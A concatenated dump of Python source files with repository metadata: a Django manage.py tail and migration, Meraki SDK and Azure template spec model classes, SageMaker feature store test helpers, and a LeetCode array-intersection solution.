os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HelloWorldUdemy.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
cc835a2e423f86342cc8680a183f393ecf36c646
|
78a15793be1ba71ea7eecee33abef4ecbe11d8f2
|
/apps/tasks/migrations/0007_task_prototype.py
|
8aaf0c000b7bb98be1e6a4e5e5a008f2ba9330e0
|
[] |
no_license
|
teresaylin/my2009
|
f5df9c62492d4c88931f6aa45af31ee88dbe3a1a
|
2486750ad73df313d596497b0eb7f4c47518e6a6
|
refs/heads/master
| 2021-03-21T23:53:55.581074 | 2016-06-01T18:13:44 | 2016-06-01T18:13:44 | 23,392,283 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 490 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('tasks', '0006_auto_20150112_1549'),
]
operations = [
migrations.AddField(
model_name='task',
name='prototype',
field=models.ForeignKey(blank=True, null=True, to='tasks.Task', related_name='prototype_for'),
preserve_default=True,
),
]
|
[
"[email protected]"
] | |
bc5605235c47c590538bf12a1da25091b2f5baa9
|
fc1c1e88a191b47f745625688d33555901fd8e9a
|
/meraki_sdk/models/update_network_switch_link_aggregation_model.py
|
ae44c5120556a9d79b3eaa75edadd21fd9fcaf0c
|
[
"MIT",
"Python-2.0"
] |
permissive
|
RaulCatalano/meraki-python-sdk
|
9161673cfd715d147e0a6ddb556d9c9913e06580
|
9894089eb013318243ae48869cc5130eb37f80c0
|
refs/heads/master
| 2022-04-02T08:36:03.907147 | 2020-02-03T19:24:04 | 2020-02-03T19:24:04 | 416,889,849 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,722 |
py
|
# -*- coding: utf-8 -*-
"""
meraki_sdk
This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ).
"""
import meraki_sdk.models.switch_port_model
import meraki_sdk.models.switch_profile_port_model
class UpdateNetworkSwitchLinkAggregationModel(object):
"""Implementation of the 'updateNetworkSwitchLinkAggregation' model.
TODO: type model description here.
Attributes:
switch_ports (list of SwitchPortModel): Array of switch or stack ports
for updating aggregation group. Minimum 2 and maximum 8 ports are
supported.
switch_profile_ports (list of SwitchProfilePortModel): Array of switch
profile ports for updating aggregation group. Minimum 2 and
maximum 8 ports are supported.
"""
# Create a mapping from Model property names to API property names
_names = {
"switch_ports":'switchPorts',
"switch_profile_ports":'switchProfilePorts'
}
def __init__(self,
switch_ports=None,
switch_profile_ports=None):
"""Constructor for the UpdateNetworkSwitchLinkAggregationModel class"""
# Initialize members of the class
self.switch_ports = switch_ports
self.switch_profile_ports = switch_profile_ports
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
switch_ports = None
if dictionary.get('switchPorts') != None:
switch_ports = list()
for structure in dictionary.get('switchPorts'):
switch_ports.append(meraki_sdk.models.switch_port_model.SwitchPortModel.from_dictionary(structure))
switch_profile_ports = None
if dictionary.get('switchProfilePorts') != None:
switch_profile_ports = list()
for structure in dictionary.get('switchProfilePorts'):
switch_profile_ports.append(meraki_sdk.models.switch_profile_port_model.SwitchProfilePortModel.from_dictionary(structure))
# Return an object of this model
return cls(switch_ports,
switch_profile_ports)
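A minimal usage sketch for the deserialization helper above; the payload only exercises the two known keys with empty arrays, since the exact port dictionary format is not shown in this file:

```python
payload = {"switchPorts": [], "switchProfilePorts": []}
model = UpdateNetworkSwitchLinkAggregationModel.from_dictionary(payload)
print(model.switch_ports, model.switch_profile_ports)  # [] []
```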
|
[
"[email protected]"
] | |
c1cc6d515458baffe471b2ce6885e3399146a037
|
b095173b2dbc77c8ad61c42403258c76169b7a63
|
/tests/unit/sagemaker/feature_store/feature_processor/test_data_helpers.py
|
a539c1b8d0e12b36adf3caff9af1e6c6a5a997de
|
[
"Apache-2.0"
] |
permissive
|
aws/sagemaker-python-sdk
|
666665e717cfb76698ba3ea7563b45344634264d
|
8d5d7fd8ae1a917ed3e2b988d5e533bce244fd85
|
refs/heads/master
| 2023-09-04T01:00:20.663626 | 2023-08-31T15:29:19 | 2023-08-31T15:29:19 | 110,621,895 | 2,050 | 1,255 |
Apache-2.0
| 2023-09-14T17:37:15 | 2017-11-14T01:03:33 |
Python
|
UTF-8
|
Python
| false | false | 5,596 |
py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import datetime
import json
from dateutil.tz import tzlocal
from sagemaker.feature_store.feature_processor._data_source import (
CSVDataSource,
FeatureGroupDataSource,
)
from sagemaker.feature_store.feature_processor._enums import FeatureProcessorMode
from sagemaker.feature_store.feature_processor._feature_processor_config import (
FeatureProcessorConfig,
)
INPUT_S3_URI = "s3://bucket/prefix/"
INPUT_FEATURE_GROUP_NAME = "input-fg"
INPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/input-fg"
INPUT_FEATURE_GROUP_S3_URI = "s3://bucket/input-fg/"
INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI = (
"s3://bucket/input-fg/feature-store/12345789012/"
"sagemaker/us-west-2/offline-store/input-fg-12345/data"
)
FEATURE_GROUP_DATA_SOURCE = FeatureGroupDataSource(name=INPUT_FEATURE_GROUP_ARN)
S3_DATA_SOURCE = CSVDataSource(s3_uri=INPUT_S3_URI)
FEATURE_PROCESSOR_INPUTS = [FEATURE_GROUP_DATA_SOURCE, S3_DATA_SOURCE]
OUTPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/output-fg"
FEATURE_GROUP_SYSTEM_PARAMS = {
"feature_group_name": "input-fg",
"online_store_enabled": True,
"offline_store_enabled": False,
"offline_store_resolved_s3_uri": None,
}
SYSTEM_PARAMS = {"system": {"scheduled_time": "2023-03-25T02:01:26Z"}}
USER_INPUT_PARAMS = {
"some-key": "some-value",
"some-other-key": {"some-key": "some-value"},
}
DESCRIBE_FEATURE_GROUP_RESPONSE = {
"FeatureGroupArn": INPUT_FEATURE_GROUP_ARN,
"FeatureGroupName": INPUT_FEATURE_GROUP_NAME,
"RecordIdentifierFeatureName": "id",
"EventTimeFeatureName": "ingest_time",
"FeatureDefinitions": [
{"FeatureName": "id", "FeatureType": "String"},
{"FeatureName": "model", "FeatureType": "String"},
{"FeatureName": "model_year", "FeatureType": "String"},
{"FeatureName": "status", "FeatureType": "String"},
{"FeatureName": "mileage", "FeatureType": "String"},
{"FeatureName": "price", "FeatureType": "String"},
{"FeatureName": "msrp", "FeatureType": "String"},
{"FeatureName": "ingest_time", "FeatureType": "Fractional"},
],
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"OnlineStoreConfig": {"EnableOnlineStore": True},
"OfflineStoreConfig": {
"S3StorageConfig": {
"S3Uri": INPUT_FEATURE_GROUP_S3_URI,
"ResolvedOutputS3Uri": INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI,
},
"DisableGlueTableCreation": False,
"DataCatalogConfig": {
"TableName": "input_fg_1680142547",
"Catalog": "AwsDataCatalog",
"Database": "sagemaker_featurestore",
},
},
"RoleArn": "arn:aws:iam::12345789012:role/role-name",
"FeatureGroupStatus": "Created",
"OnlineStoreTotalSizeBytes": 12345,
"ResponseMetadata": {
"RequestId": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"HTTPStatusCode": 200,
"HTTPHeaders": {
"x-amzn-requestid": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"content-type": "application/x-amz-json-1.1",
"content-length": "1311",
"date": "Fri, 31 Mar 2023 01:05:49 GMT",
},
"RetryAttempts": 0,
},
}
PIPELINE = {
"PipelineArn": "some_pipeline_arn",
"RoleArn": "some_execution_role_arn",
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"PipelineDefinition": json.dumps(
{
"Steps": [
{
"RetryPolicies": [
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": ["Step.SERVICE_FAULT", "Step.THROTTLING"],
},
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": [
"SageMaker.JOB_INTERNAL_ERROR",
"SageMaker.CAPACITY_ERROR",
"SageMaker.RESOURCE_LIMIT",
],
},
]
}
]
}
),
}
def create_fp_config(
inputs=None,
output=OUTPUT_FEATURE_GROUP_ARN,
mode=FeatureProcessorMode.PYSPARK,
target_stores=None,
enable_ingestion=True,
parameters=None,
):
"""Helper method to create a FeatureProcessorConfig with fewer arguments."""
return FeatureProcessorConfig.create(
inputs=inputs or FEATURE_PROCESSOR_INPUTS,
output=output,
mode=mode,
target_stores=target_stores,
enable_ingestion=enable_ingestion,
parameters=parameters,
)
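A minimal usage sketch of the helper above, relying only on the defaults and constants defined in this module:

```python
# Falls back to FEATURE_PROCESSOR_INPUTS and OUTPUT_FEATURE_GROUP_ARN defined above.
fp_config = create_fp_config(parameters=USER_INPUT_PARAMS)
```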
|
[
"[email protected]"
] | |
c8dcd1cedd1d97b890b8d2a3f6acf93613e18b7a
|
09df89395816834ddf77de620f959c22e74d8c00
|
/HashTable/IntersectionOfTwoArrays.py
|
c9236cc4818230a0b857c950f279ebbd7dea479b
|
[] |
no_license
|
gdh756462786/Leetcode_by_python
|
c853c4e3de255a8b4016c59944a0d40213a539a7
|
6387543a2a23c30aef1d5d37db54ca72cfb19270
|
refs/heads/master
| 2020-06-22T11:53:24.758506 | 2018-12-28T03:03:31 | 2018-12-28T03:03:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,543 |
py
|
# -*- coding: utf-8 -*-
'''
Given two arrays, write a function to compute their intersection.
Example:
Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2, 2].
'''
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
nums1.sort()
nums2.sort()
result = []
while nums1 and nums2:
if nums2[0] == nums1[0]:
result.append(nums2.pop(0))
nums1.pop(0)
else:
if nums2[0] > nums1[0]:
nums1.pop(0)
else:
nums2.pop(0)
return result
'''
Method 2
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
count = {}
res = []
for item in nums1:
if item not in count:
count[item] = [1, 0]
else:
count[item][0] += 1
for item in nums2:
if item in count:
count[item][1] +=1
for key in count:
if count[key][0] * count[key][1] > 0:
for i in range(min(count[key][0], count[key][1])):
res.append(key)
return res
'''
'''
Test:
nums1 = [1,2,2,1]
nums2 = [2,2]
'''
solution = Solution()
nums1 = [1,2,2,1]
nums2 = [2,2]
res = solution.intersect(nums1, nums2)
print res
|
[
"[email protected]"
] | |
e5c24b0ad4810b600126263001991245efd2eeee
|
d7016f69993570a1c55974582cda899ff70907ec
|
/sdk/resources/azure-mgmt-resource/azure/mgmt/resource/templatespecs/v2021_05_01/models/_models_py3.py
|
341eee03d5868d8a00c8823395f60df3178711dd
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
kurtzeborn/azure-sdk-for-python
|
51ca636ad26ca51bc0c9e6865332781787e6f882
|
b23e71b289c71f179b9cf9b8c75b1922833a542a
|
refs/heads/main
| 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 |
MIT
| 2022-07-19T08:05:23 | 2018-11-16T22:15:30 |
Python
|
UTF-8
|
Python
| false | false | 24,027 |
py
|
# coding=utf-8
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
import sys
from typing import Any, Dict, List, Optional, TYPE_CHECKING, Union
from ... import _serialization
if sys.version_info >= (3, 9):
from collections.abc import MutableMapping
else:
from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from .. import models as _models
JSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object
class AzureResourceBase(_serialization.Model):
"""Common properties for all Azure resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ErrorAdditionalInfo(_serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: JSON
"""
_validation = {
"type": {"readonly": True},
"info": {"readonly": True},
}
_attribute_map = {
"type": {"key": "type", "type": "str"},
"info": {"key": "info", "type": "object"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.type = None
self.info = None
class ErrorResponse(_serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorResponse]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorAdditionalInfo]
"""
_validation = {
"code": {"readonly": True},
"message": {"readonly": True},
"target": {"readonly": True},
"details": {"readonly": True},
"additional_info": {"readonly": True},
}
_attribute_map = {
"code": {"key": "code", "type": "str"},
"message": {"key": "message", "type": "str"},
"target": {"key": "target", "type": "str"},
"details": {"key": "details", "type": "[ErrorResponse]"},
"additional_info": {"key": "additionalInfo", "type": "[ErrorAdditionalInfo]"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class LinkedTemplateArtifact(_serialization.Model):
"""Represents a Template Spec artifact containing an embedded Azure Resource Manager template for use as a linked template.
All required parameters must be populated in order to send to Azure.
:ivar path: A filesystem safe relative path of the artifact. Required.
:vartype path: str
:ivar template: The Azure Resource Manager template. Required.
:vartype template: JSON
"""
_validation = {
"path": {"required": True},
"template": {"required": True},
}
_attribute_map = {
"path": {"key": "path", "type": "str"},
"template": {"key": "template", "type": "object"},
}
def __init__(self, *, path: str, template: JSON, **kwargs):
"""
:keyword path: A filesystem safe relative path of the artifact. Required.
:paramtype path: str
:keyword template: The Azure Resource Manager template. Required.
:paramtype template: JSON
"""
super().__init__(**kwargs)
self.path = path
self.template = template
class SystemData(_serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:ivar created_by: The identity that created the resource.
:vartype created_by: str
:ivar created_by_type: The type of identity that created the resource. Known values are:
"User", "Application", "ManagedIdentity", and "Key".
:vartype created_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:ivar created_at: The timestamp of resource creation (UTC).
:vartype created_at: ~datetime.datetime
:ivar last_modified_by: The identity that last modified the resource.
:vartype last_modified_by: str
:ivar last_modified_by_type: The type of identity that last modified the resource. Known values
are: "User", "Application", "ManagedIdentity", and "Key".
:vartype last_modified_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:ivar last_modified_at: The timestamp of resource last modification (UTC).
:vartype last_modified_at: ~datetime.datetime
"""
_attribute_map = {
"created_by": {"key": "createdBy", "type": "str"},
"created_by_type": {"key": "createdByType", "type": "str"},
"created_at": {"key": "createdAt", "type": "iso-8601"},
"last_modified_by": {"key": "lastModifiedBy", "type": "str"},
"last_modified_by_type": {"key": "lastModifiedByType", "type": "str"},
"last_modified_at": {"key": "lastModifiedAt", "type": "iso-8601"},
}
def __init__(
self,
*,
created_by: Optional[str] = None,
created_by_type: Optional[Union[str, "_models.CreatedByType"]] = None,
created_at: Optional[datetime.datetime] = None,
last_modified_by: Optional[str] = None,
last_modified_by_type: Optional[Union[str, "_models.CreatedByType"]] = None,
last_modified_at: Optional[datetime.datetime] = None,
**kwargs
):
"""
:keyword created_by: The identity that created the resource.
:paramtype created_by: str
:keyword created_by_type: The type of identity that created the resource. Known values are:
"User", "Application", "ManagedIdentity", and "Key".
:paramtype created_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:keyword created_at: The timestamp of resource creation (UTC).
:paramtype created_at: ~datetime.datetime
:keyword last_modified_by: The identity that last modified the resource.
:paramtype last_modified_by: str
:keyword last_modified_by_type: The type of identity that last modified the resource. Known
values are: "User", "Application", "ManagedIdentity", and "Key".
:paramtype last_modified_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:keyword last_modified_at: The timestamp of resource last modification (UTC).
:paramtype last_modified_at: ~datetime.datetime
"""
super().__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
class TemplateSpec(AzureResourceBase):
"""Template Spec object.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar location: The location of the Template Spec. It cannot be changed after Template Spec
creation. It must be one of the supported Azure locations. Required.
:vartype location: str
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar description: Template Spec description.
:vartype description: str
:ivar display_name: Template Spec display name.
:vartype display_name: str
:ivar metadata: The Template Spec metadata. Metadata is an open-ended object and is typically a
collection of key-value pairs.
:vartype metadata: JSON
:ivar versions: High-level information about the versions within this Template Spec. The keys
are the version names. Only populated if the $expand query parameter is set to 'versions'.
:vartype versions: dict[str,
~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpecVersionInfo]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
"location": {"required": True},
"description": {"max_length": 4096},
"display_name": {"max_length": 64},
"versions": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"description": {"key": "properties.description", "type": "str"},
"display_name": {"key": "properties.displayName", "type": "str"},
"metadata": {"key": "properties.metadata", "type": "object"},
"versions": {"key": "properties.versions", "type": "{TemplateSpecVersionInfo}"},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
description: Optional[str] = None,
display_name: Optional[str] = None,
metadata: Optional[JSON] = None,
**kwargs
):
"""
:keyword location: The location of the Template Spec. It cannot be changed after Template Spec
creation. It must be one of the supported Azure locations. Required.
:paramtype location: str
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword description: Template Spec description.
:paramtype description: str
:keyword display_name: Template Spec display name.
:paramtype display_name: str
:keyword metadata: The Template Spec metadata. Metadata is an open-ended object and is
typically a collection of key-value pairs.
:paramtype metadata: JSON
"""
super().__init__(**kwargs)
self.location = location
self.tags = tags
self.description = description
self.display_name = display_name
self.metadata = metadata
self.versions = None
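A minimal construction sketch for the model above; the location, tags and description values are illustrative placeholders, not taken from the SDK documentation:

```python
spec = TemplateSpec(
    location="westus2",                  # required, cannot be changed after creation
    tags={"env": "dev"},
    description="Example template spec",
    display_name="example-spec",
)
```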
class TemplateSpecsError(_serialization.Model):
"""Template Specs error response.
:ivar error: Common error response for all Azure Resource Manager APIs to return error details
for failed operations. (This also follows the OData error response format.).
:vartype error: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorResponse
"""
_attribute_map = {
"error": {"key": "error", "type": "ErrorResponse"},
}
def __init__(self, *, error: Optional["_models.ErrorResponse"] = None, **kwargs):
"""
:keyword error: Common error response for all Azure Resource Manager APIs to return error
details for failed operations. (This also follows the OData error response format.).
:paramtype error: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorResponse
"""
super().__init__(**kwargs)
self.error = error
class TemplateSpecsListResult(_serialization.Model):
"""List of Template Specs.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: An array of Template Specs.
:vartype value: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpec]
:ivar next_link: The URL to use for getting the next set of results.
:vartype next_link: str
"""
_validation = {
"next_link": {"readonly": True},
}
_attribute_map = {
"value": {"key": "value", "type": "[TemplateSpec]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, *, value: Optional[List["_models.TemplateSpec"]] = None, **kwargs):
"""
:keyword value: An array of Template Specs.
:paramtype value: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpec]
"""
super().__init__(**kwargs)
self.value = value
self.next_link = None
class TemplateSpecUpdateModel(AzureResourceBase):
"""Template Spec properties to be updated (only tags are currently supported).
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"tags": {"key": "tags", "type": "{str}"},
}
def __init__(self, *, tags: Optional[Dict[str, str]] = None, **kwargs):
"""
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
"""
super().__init__(**kwargs)
self.tags = tags
class TemplateSpecVersion(AzureResourceBase): # pylint: disable=too-many-instance-attributes
"""Template Spec Version object.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar location: The location of the Template Spec Version. It must match the location of the
parent Template Spec. Required.
:vartype location: str
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar description: Template Spec version description.
:vartype description: str
:ivar linked_templates: An array of linked template artifacts.
:vartype linked_templates:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.LinkedTemplateArtifact]
:ivar metadata: The version metadata. Metadata is an open-ended object and is typically a
collection of key-value pairs.
:vartype metadata: JSON
:ivar main_template: The main Azure Resource Manager template content.
:vartype main_template: JSON
:ivar ui_form_definition: The Azure Resource Manager template UI definition content.
:vartype ui_form_definition: JSON
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
"location": {"required": True},
"description": {"max_length": 4096},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"description": {"key": "properties.description", "type": "str"},
"linked_templates": {"key": "properties.linkedTemplates", "type": "[LinkedTemplateArtifact]"},
"metadata": {"key": "properties.metadata", "type": "object"},
"main_template": {"key": "properties.mainTemplate", "type": "object"},
"ui_form_definition": {"key": "properties.uiFormDefinition", "type": "object"},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
description: Optional[str] = None,
linked_templates: Optional[List["_models.LinkedTemplateArtifact"]] = None,
metadata: Optional[JSON] = None,
main_template: Optional[JSON] = None,
ui_form_definition: Optional[JSON] = None,
**kwargs
):
"""
:keyword location: The location of the Template Spec Version. It must match the location of the
parent Template Spec. Required.
:paramtype location: str
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword description: Template Spec version description.
:paramtype description: str
:keyword linked_templates: An array of linked template artifacts.
:paramtype linked_templates:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.LinkedTemplateArtifact]
:keyword metadata: The version metadata. Metadata is an open-ended object and is typically a
collection of key-value pairs.
:paramtype metadata: JSON
:keyword main_template: The main Azure Resource Manager template content.
:paramtype main_template: JSON
:keyword ui_form_definition: The Azure Resource Manager template UI definition content.
:paramtype ui_form_definition: JSON
"""
super().__init__(**kwargs)
self.location = location
self.tags = tags
self.description = description
self.linked_templates = linked_templates
self.metadata = metadata
self.main_template = main_template
self.ui_form_definition = ui_form_definition
class TemplateSpecVersionInfo(_serialization.Model):
"""High-level information about a Template Spec version.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar description: Template Spec version description.
:vartype description: str
:ivar time_created: The timestamp of when the version was created.
:vartype time_created: ~datetime.datetime
:ivar time_modified: The timestamp of when the version was last modified.
:vartype time_modified: ~datetime.datetime
"""
_validation = {
"description": {"readonly": True},
"time_created": {"readonly": True},
"time_modified": {"readonly": True},
}
_attribute_map = {
"description": {"key": "description", "type": "str"},
"time_created": {"key": "timeCreated", "type": "iso-8601"},
"time_modified": {"key": "timeModified", "type": "iso-8601"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.description = None
self.time_created = None
self.time_modified = None
class TemplateSpecVersionsListResult(_serialization.Model):
"""List of Template Specs versions.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: An array of Template Spec versions.
:vartype value: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpecVersion]
:ivar next_link: The URL to use for getting the next set of results.
:vartype next_link: str
"""
_validation = {
"next_link": {"readonly": True},
}
_attribute_map = {
"value": {"key": "value", "type": "[TemplateSpecVersion]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, *, value: Optional[List["_models.TemplateSpecVersion"]] = None, **kwargs):
"""
:keyword value: An array of Template Spec versions.
:paramtype value:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpecVersion]
"""
super().__init__(**kwargs)
self.value = value
self.next_link = None
class TemplateSpecVersionUpdateModel(AzureResourceBase):
"""Template Spec Version properties to be updated (only tags are currently supported).
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"tags": {"key": "tags", "type": "{str}"},
}
def __init__(self, *, tags: Optional[Dict[str, str]] = None, **kwargs):
"""
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
"""
super().__init__(**kwargs)
self.tags = tags
|
[
"[email protected]"
] | |
e2b08af0cf472fba90e20de63c2f33fe20f598d9
|
2a45af8ec8a4c87d544f461d27795a283f8f5f67
|
/python/termcolor.py
|
d653691bc187a1bbfe10735a28e6d377d5049fb5
|
[] |
no_license
|
fengidri/python-script
|
2199a16a2d0cc76e6055aec31aaced4638a8c86d
|
28fb8e6dbf9e6ba5a1f9c4c3d7b635212bfc5b66
|
refs/heads/master
| 2020-04-05T14:04:55.103302 | 2017-04-27T10:32:27 | 2017-04-27T10:32:27 | 8,678,963 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,235 |
py
